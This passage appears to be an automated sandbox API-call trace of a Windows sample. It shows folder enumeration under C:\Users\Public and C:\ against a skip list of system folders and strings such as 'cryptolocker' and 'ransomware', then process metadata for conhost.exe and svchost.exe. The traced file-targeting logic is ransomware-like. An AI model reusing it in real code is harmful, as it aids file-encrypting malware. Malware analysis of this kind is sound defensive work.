lpSrch="C:\\WINDOWS") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.805] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="C:\\Program Files") returned 0x0 [0129.805] GetProcessHeap () returned 0xe30000 [0129.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xed39f8 [0129.805] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Public\\Music", cchMax=1068 | out: psz1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0129.805] StrNCatW (in: psz1="C:\\Users\\Public\\Music", psz2="\\*", cchMax=1068 | out: psz1="C:\\Users\\Public\\Music\\*") returned="C:\\Users\\Public\\Music\\*" [0129.805] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2370 [0129.805] StrCmpW (psz1=".", psz2=".") returned 0 [0129.805] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.806] StrCmpW (psz1="..", psz2=".") returned 1 [0129.806] StrCmpW (psz1="..", psz2="..") returned 0 [0129.806] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.806] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.806] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.806] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0129.806] FindClose (in: hFindFile=0xec2370 | out: hFindFile=0xec2370) returned 1 [0129.806] GetProcessHeap () returned 0xe30000 [0129.806] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.806] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0129.806] StrCmpW (psz1="Pictures", psz2=".") returned 1 [0129.806] StrCmpW (psz1="Pictures", psz2="..") returned 1 [0129.806] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0129.806] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0129.806] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Pictures", cchMax=1056 | out: psz1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\boot\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\programdata\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\drivers\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\wsus\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="crypt_detect") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="cryptolocker") returned 0x0 [0129.806] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="ransomware") returned 0x0 [0129.807] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0129.807] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.807] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="C:\\Program Files") returned 0x0 [0129.807] GetProcessHeap () returned 0xe30000 [0129.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xed39f8 [0129.807] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Public\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0129.807] StrNCatW (in: psz1="C:\\Users\\Public\\Pictures", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\Public\\Pictures\\*") returned="C:\\Users\\Public\\Pictures\\*" [0129.807] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2370 [0129.807] StrCmpW (psz1=".", psz2=".") returned 0 [0129.807] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.807] StrCmpW (psz1="..", psz2=".") returned 1 [0129.807] StrCmpW (psz1="..", psz2="..") returned 0 [0129.807] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.807] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.807] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.807] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0129.807] FindClose (in: hFindFile=0xec2370 | out: hFindFile=0xec2370) returned 1 [0129.807] GetProcessHeap () returned 0xe30000 [0129.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.807] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0129.807] StrCmpW (psz1="Videos", psz2=".") returned 1 [0129.807] StrCmpW (psz1="Videos", psz2="..") returned 1 [0129.807] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0129.807] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0129.807] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Videos", cchMax=1056 | out: psz1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0129.807] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\system32\\") returned 0x0 [0129.807] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.807] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\system\\") returned 0x0 [0129.807] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.807] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\appdata\\local\\") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\boot\\") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\perflogs\\") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\programdata\\") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\drivers\\") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\wsus\\") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="crypt_detect") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="cryptolocker") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="ransomware") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="C:\\WINDOWS") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.808] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="C:\\Program Files") returned 0x0 [0129.808] GetProcessHeap () returned 0xe30000 [0129.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ae) returned 0xed39f8 [0129.808] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Public\\Videos", cchMax=1070 | out: psz1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0129.808] StrNCatW (in: psz1="C:\\Users\\Public\\Videos", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\Public\\Videos\\*") returned="C:\\Users\\Public\\Videos\\*" [0129.808] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2370 [0129.808] StrCmpW (psz1=".", psz2=".") returned 0 [0129.808] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.808] StrCmpW (psz1="..", psz2=".") returned 1 [0129.808] StrCmpW (psz1="..", psz2="..") returned 0 [0129.808] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.808] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.808] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.808] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0129.808] FindClose (in: hFindFile=0xec2370 | out: hFindFile=0xec2370) returned 1 [0129.809] GetProcessHeap () returned 0xe30000 [0129.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.809] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0129.809] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0129.809] GetProcessHeap () returned 0xe30000 [0129.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0129.809] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0129.809] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0129.809] GetProcessHeap () returned 0xe30000 [0129.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0129.809] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0129.809] StrCmpW (psz1="Windows", psz2=".") returned 1 [0129.809] StrCmpW (psz1="Windows", psz2="..") returned 1 [0129.809] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0129.809] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0129.809] StrNCatW (in: psz1="C:\\", psz2="Windows", cchMax=1030 | out: psz1="C:\\Windows") returned="C:\\Windows" [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\system32\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\system\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\appdata\\local\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\boot\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\perflogs\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\programdata\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\drivers\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\wsus\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.809] StrStrIW (lpFirst="C:\\Windows", lpSrch="crypt_detect") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows", lpSrch="cryptolocker") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows", lpSrch="ransomware") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows", lpSrch="C:\\WINDOWS") returned="C:\\Windows" [0129.810] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 1 [0129.810] StrCmpW (psz1="Windows10Upgrade", psz2=".") returned 1 [0129.810] StrCmpW (psz1="Windows10Upgrade", psz2="..") returned 1 [0129.810] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0129.810] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0129.810] StrNCatW (in: psz1="C:\\", psz2="Windows10Upgrade", cchMax=1030 | out: psz1="C:\\Windows10Upgrade") returned="C:\\Windows10Upgrade" [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\system32\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\system\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\appdata\\local\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\boot\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\perflogs\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\programdata\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\drivers\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\wsus\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="crypt_detect") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="cryptolocker") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="ransomware") returned 0x0 [0129.810] StrStrIW (lpFirst="C:\\Windows10Upgrade", lpSrch="C:\\WINDOWS") returned="C:\\Windows10Upgrade" [0129.810] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 0 [0129.810] FindClose (in: hFindFile=0xec21f0 | out: hFindFile=0xec21f0) returned 1 [0129.810] GetProcessHeap () returned 0xe30000 [0129.810] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xee8818 | out: hHeap=0xe30000) returned 1 Process: id = "2" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x14b78000" os_pid = "0x704" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf00" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 2 os_tid = 0x13c0 Thread: id = 3 os_tid = 0x13d4 Thread: id = 4 os_tid = 0x13f4 Thread: id = 5 os_tid = 0xfd4 Thread: id = 6 os_tid = 0xfe8 Thread: id = 16 os_tid = 0xd68 Thread: id = 17 os_tid = 0x1010 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4c27d000" os_pid = "0x5b0" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = 